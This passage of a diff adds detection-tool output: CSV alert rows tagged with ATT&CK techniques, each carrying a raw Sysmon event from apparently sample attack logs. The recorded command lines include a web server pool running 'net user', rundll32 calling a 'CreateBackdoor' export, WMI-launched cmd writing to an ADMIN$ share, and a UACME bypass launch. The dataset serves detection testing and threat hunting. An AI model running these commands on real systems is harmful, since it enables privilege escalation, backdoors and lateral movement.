+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Detect IIS/Exchange Exploitation,1558661633.122501,2019-05-24T05:33:53.122501+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\cmd.exe) and commandline ( &quot;c:\windows\system32\cmd.exe&quot; /c net user ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-24T01:33:53.112486Z"">
+    </TimeCreated>
+    <EventRecordID>1044</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""2092"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-24 01:33:53.112</Data>
+    <Data Name=""ProcessGuid"">365ABB72-4A01-5CE7-0000-0010EE9DAC00</Data>
+    <Data Name=""ProcessId"">2404</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;c:\windows\system32\cmd.exe&quot; /c net user</Data>
+    <Data Name=""CurrentDirectory"">c:\windows\system32\inetsrv\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-45C7-5CE7-0000-002092F99C00</Data>
+    <Data Name=""LogonId"">0x9cf992</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-49D6-5CE7-0000-001020A7A700</Data>
+    <Data Name=""ParentProcessId"">2580</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\inetsrv\w3wp.exe</Data>
+    <Data Name=""ParentCommandLine"">c:\windows\system32\inetsrv\w3wp.exe -ap &quot;DefaultAppPool&quot; -v &quot;v2.0&quot; -l &quot;webengine4.dll&quot; -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h &quot;C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config&quot; -w &quot;&quot; -m 0 -t 20</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.499077Z"">
+    </TimeCreated>
+    <EventRecordID>243562</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.488</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00105B9A2000</Data>
+    <Data Name=""ProcessId"">2028</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd  1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-30T20:32:51.246714Z"">
+    </TimeCreated>
+    <EventRecordID>9827</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1964"" ThreadID=""1664"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-30 20:32:51.246</Data>
+    <Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-0010B1361D00</Data>
+    <Data Name=""ProcessId"">2504</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe /Q /c cd  1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
+    <Data Name=""CurrentDirectory"">C:\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
+    <Data Name=""LogonId"">0x1d313d</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
+    <Data Name=""ParentProcessId"">836</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558661633.122501,2019-05-24T05:33:53.122501+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;c:\windows\system32\cmd.exe&quot; /c net user ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-24T01:33:53.112486Z"">
+    </TimeCreated>
+    <EventRecordID>1044</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""2092"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-24 01:33:53.112</Data>
+    <Data Name=""ProcessGuid"">365ABB72-4A01-5CE7-0000-0010EE9DAC00</Data>
+    <Data Name=""ProcessId"">2404</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;c:\windows\system32\cmd.exe&quot; /c net user</Data>
+    <Data Name=""CurrentDirectory"">c:\windows\system32\inetsrv\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-45C7-5CE7-0000-002092F99C00</Data>
+    <Data Name=""LogonId"">0x9cf992</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-49D6-5CE7-0000-001020A7A700</Data>
+    <Data Name=""ParentProcessId"">2580</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\inetsrv\w3wp.exe</Data>
+    <Data Name=""ParentCommandLine"">c:\windows\system32\inetsrv\w3wp.exe -ap &quot;DefaultAppPool&quot; -v &quot;v2.0&quot; -l &quot;webengine4.dll&quot; -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h &quot;C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config&quot; -w &quot;&quot; -m 0 -t 20</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd  1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-30T20:32:51.246714Z"">
+    </TimeCreated>
+    <EventRecordID>9827</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1964"" ThreadID=""1664"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-30 20:32:51.246</Data>
+    <Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-0010B1361D00</Data>
+    <Data Name=""ProcessId"">2504</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe /Q /c cd  1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
+    <Data Name=""CurrentDirectory"">C:\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
+    <Data Name=""LogonId"">0x1d313d</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
+    <Data Name=""ParentProcessId"">836</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd  1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-30T20:32:51.246714Z"">
+    </TimeCreated>
+    <EventRecordID>9827</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1964"" ThreadID=""1664"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-30 20:32:51.246</Data>
+    <Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-0010B1361D00</Data>
+    <Data Name=""ProcessId"">2504</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe /Q /c cd  1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
+    <Data Name=""CurrentDirectory"">C:\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
+    <Data Name=""LogonId"">0x1d313d</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
+    <Data Name=""ParentProcessId"">836</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564911238.127145,2019-08-04T13:33:58.127145+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\windows\system32\cmd.exe &quot;C:\Windows\system32\osk.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-04T09:33:58.087775Z"">
+    </TimeCreated>
+    <EventRecordID>5764</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2780"" ThreadID=""3676"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-04 09:33:57.876</Data>
+    <Data Name=""ProcessGuid"">747F3D96-A685-5D46-0000-00100D41D703</Data>
+    <Data Name=""ProcessId"">3296</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\windows\system32\cmd.exe &quot;C:\Windows\system32\osk.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020FBD31800</Data>
+    <Data Name=""LogonId"">0x18d3fb</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-A685-5D46-0000-00109B2AD703</Data>
+    <Data Name=""ParentProcessId"">3916</Data>
+    <Data Name=""ParentImage"">C:\Users\IEUser\Desktop\UACME.exe</Data>
+    <Data Name=""ParentCommandLine"">UACME.exe  55 c:\Windows\SysWOW64\notepad.exe</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1618950781.944467,2021-04-21T00:33:01.944467+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 127.0.0.1 ) to hostname ( MSEDGEWIN10 ) , IP ( 127.0.0.1 ) and port ( 445 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>3</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>3</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-04-20T20:33:01.944115Z"">
+    </TimeCreated>
+    <EventRecordID>578500</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3392"" ThreadID=""4248"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">Suspicious NetCon</Data>
+    <Data Name=""UtcTime"">2021-04-20 20:33:59.834</Data>
+    <Data Name=""ProcessGuid"">747F3D96-04C3-607F-0000-0010F13B1E00</Data>
+    <Data Name=""ProcessId"">2532</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Protocol"">tcp</Data>
+    <Data Name=""Initiated"">true</Data>
+    <Data Name=""SourceIsIpv6"">false</Data>
+    <Data Name=""SourceIp"">127.0.0.1</Data>
+    <Data Name=""SourceHostname"">MSEDGEWIN10</Data>
+    <Data Name=""SourcePort"">49925</Data>
+    <Data Name=""SourcePortName""></Data>
+    <Data Name=""DestinationIsIpv6"">false</Data>
+    <Data Name=""DestinationIp"">127.0.0.1</Data>
+    <Data Name=""DestinationHostname"">MSEDGEWIN10</Data>
+    <Data Name=""DestinationPort"">445</Data>
+    <Data Name=""DestinationPortName"">microsoft-ds</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-30T20:32:51.168589Z"">
+    </TimeCreated>
+    <EventRecordID>9826</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1964"" ThreadID=""1664"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-30 20:32:51.168</Data>
+    <Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-00105F321D00</Data>
+    <Data Name=""ProcessId"">3840</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
+    <Data Name=""CurrentDirectory"">C:\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
+    <Data Name=""LogonId"">0x1d313d</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
+    <Data Name=""ParentProcessId"">836</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-30T20:32:51.168589Z"">
+    </TimeCreated>
+    <EventRecordID>9826</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1964"" ThreadID=""1664"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-30 20:32:51.168</Data>
+    <Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-00105F321D00</Data>
+    <Data Name=""ProcessId"">3840</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
+    <Data Name=""CurrentDirectory"">C:\</Data>
